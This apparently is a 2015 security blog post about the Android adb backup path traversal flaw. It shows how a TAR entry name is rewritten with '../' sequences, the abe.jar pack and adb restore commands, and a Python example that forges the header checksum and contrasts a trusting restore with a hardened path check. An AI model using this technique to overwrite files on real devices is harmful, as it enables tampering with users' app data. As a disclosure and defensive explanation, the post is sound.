Thursday 21 May 2015

Android Backup Path Traversal Attack

A vulnerability found by Imre Rad, reported almost 10 months ago, was published a week ago. All Android devices running versions below 5.0 are vulnerable to the attack discussed below.

ADB stands for Android Debug Bridge, a command line tool used to communicate with your Android device. Using ADB one can push files, view files, delete data, issue system commands and so on. One widely used command is the backup command. With adb backup a complete backup of your Android device (installed packages and their data) is created and stored on your computer, and with adb restore the user can write that backup back onto the device when needed.

The vulnerability lies in the way the debug bridge handles the storage and retrieval of a backup. On the device this process is handled by BackupManagerService; the backup itself is a TAR archive (adb backup wraps it in an .ab file, and the abe.jar tool used below converts between the two).

If the path in a TAR entry's header is modified to point at a file elsewhere on the device, then when the backup is restored the original file at that path is overwritten and the user ends up with a malicious file on the device. For a better understanding, here is an example:

Original header path:
apps/com.android.settings/foo

Changed header path:
apps/com.android.settings/foo/../../../data/system/hacker.txt

In the above example we have appended "../../../" followed by the target file path to the original header path.

To restore, we first need to pack our modified .tar file into a backup with the following command (abe.jar is Android Backup Extractor):
java -jar abe.jar pack [tar filename] [backup filename]

Now restore the backup with following command:
adb restore [filename]


Backup restore

Backup Restore Message in Device



Once the restore completes, the malicious file has been written to the traversed path on the device.

However, there are certain preconditions for the exploit to work:
  • The header checksum must match: the TAR header checksum covers the name field, so it has to be recomputed after the path is edited.
  • The partition on which the file is written must be mounted writable, e.g. /system would not work but /data would, as it is a writable partition.
  • Files owned by root will not be overwritten. This is because the restore process runs as the same user as the package, and Android packages do not run as root.
  • With the system hardening introduced in Android Open Source Project (AOSP) 4.3, which makes the restore ignore non-system agent packages, it is not possible to overwrite the file on later stock versions. However, if the device is running a custom ROM or is rooted and running a higher version such as 4.4 or above, it is most likely still possible to overwrite the file.
  • All pre-AOSP 4.3 versions are exploitable without any additional conditions. In that case it is possible to overwrite any file of any package installed on the system.
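The header rewrite shown in the example and the checksum precondition listed above, as an added Python example that is not part of the original post and is not abe's or Android's own code. It builds a constructed one-entry ustar archive standing in for the unpacked backup payload, overwrites the entry name with the traversal path and recomputes the header checksum (without the recompute, a tar reader rejects the header), then models where a trusting restore would write the entry under an assumed /data/data/<package> root, next to the path-normalisation check a hardened restore needs. The apps/<package>/<path> mapping and the data directory layout are simplifications assumed for the example; the real BackupManagerService routes entries through per-app domain directories.

```python
import io
import posixpath
import tarfile

# Constructed sample data for this example (not taken from a real device backup).
APP_PACKAGE = "com.android.settings"
ORIGINAL_NAME = "apps/com.android.settings/foo"
TRAVERSAL_NAME = "apps/com.android.settings/foo/../../../data/system/hacker.txt"
# Assumed restore root for the package (simplified model of the real layout).
APP_DATA_DIR = "/data/data/" + APP_PACKAGE

BLOCK = 512                        # tar header block size
NAME_OFF, NAME_LEN = 0, 100        # ustar "name" field
CHKSUM_OFF, CHKSUM_LEN = 148, 8    # ustar "chksum" field


def build_sample_tar(name=ORIGINAL_NAME, data=b"original settings blob\n"):
    """Return a one-entry ustar stream standing in for the unpacked .ab payload."""
    buf = io.BytesIO()
    with tarfile.open(fileobj=buf, mode="w", format=tarfile.USTAR_FORMAT) as tf:
        info = tarfile.TarInfo(name)
        info.size = len(data)
        tf.addfile(info, io.BytesIO(data))
    return buf.getvalue()


def header_checksum(header):
    """POSIX tar checksum: unsigned byte sum of the 512-byte header with the
    chksum field itself counted as eight ASCII spaces."""
    return (sum(header[:CHKSUM_OFF]) + CHKSUM_LEN * 0x20
            + sum(header[CHKSUM_OFF + CHKSUM_LEN:]))


def rewrite_entry_name(archive, new_name, fix_checksum=True):
    """Overwrite the first entry's name field in place, as the attack does.

    With fix_checksum=False the stale checksum is left behind, so the reader's
    rejection of the header (the first precondition) can be observed."""
    encoded = new_name.encode()
    if len(encoded) > NAME_LEN:
        raise ValueError("name does not fit the 100-byte ustar name field")
    header = bytearray(archive[:BLOCK])
    header[NAME_OFF:NAME_OFF + NAME_LEN] = encoded.ljust(NAME_LEN, b"\0")
    if fix_checksum:
        # Six octal digits, NUL, space: the encoding GNU tar and Python write.
        header[CHKSUM_OFF:CHKSUM_OFF + CHKSUM_LEN] = b"%06o\0 " % header_checksum(bytes(header))
    return bytes(header) + archive[BLOCK:]


def entry_names(archive):
    """Entry names as a tar reader sees them (no normalisation of '..')."""
    with tarfile.open(fileobj=io.BytesIO(archive), mode="r:") as tf:
        return tf.getnames()


def archive_is_readable(archive):
    """True if the tar reader accepts the first header, i.e. its checksum is valid."""
    try:
        entry_names(archive)
        return True
    except tarfile.ReadError:
        return False


def naive_restore_path(app_data_dir, entry_name):
    """Destination the entry lands on if the restore trusts the name field:
    apps/<package>/<rel> is joined under the package's data dir unchecked."""
    prefix, package, rel = entry_name.split("/", 2)
    if prefix != "apps" or package != posixpath.basename(app_data_dir):
        raise ValueError("entry does not belong to this package")
    return posixpath.normpath(posixpath.join(app_data_dir, rel))


def safe_restore_path(app_data_dir, entry_name):
    """Hardened variant: resolve '..' first, then require the result to stay
    inside the package's data dir. Returns None for entries that escape."""
    dest = naive_restore_path(app_data_dir, entry_name)
    base = posixpath.normpath(app_data_dir)
    if dest == base or dest.startswith(base + "/"):
        return dest
    return None


if __name__ == "__main__":
    original = build_sample_tar()
    stale = rewrite_entry_name(original, TRAVERSAL_NAME, fix_checksum=False)
    forged = rewrite_entry_name(original, TRAVERSAL_NAME)
    print("stale checksum accepted by reader:", archive_is_readable(stale))
    print("forged entry name:", entry_names(forged)[0])
    print("trusting restore writes to:", naive_restore_path(APP_DATA_DIR, TRAVERSAL_NAME))
    print("hardened restore allows:", safe_restore_path(APP_DATA_DIR, TRAVERSAL_NAME))
```

Note that the escape is only visible after normalisation: a restore that merely checks the entry starts with apps/<package>/ still accepts the forged name, which is why the hardened check compares the resolved destination against the base directory rather than inspecting the string.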

Make sure that your devices have the latest patches and security policies installed. We would also like to thank Imre and the folks at Exploit-DB for presenting us with such a beautiful exploit. If you have any queries, feel free to write to us at info@securitytheorem.com or simply leave a comment below.

Source: https://www.exploit-db.com/exploits/36813/
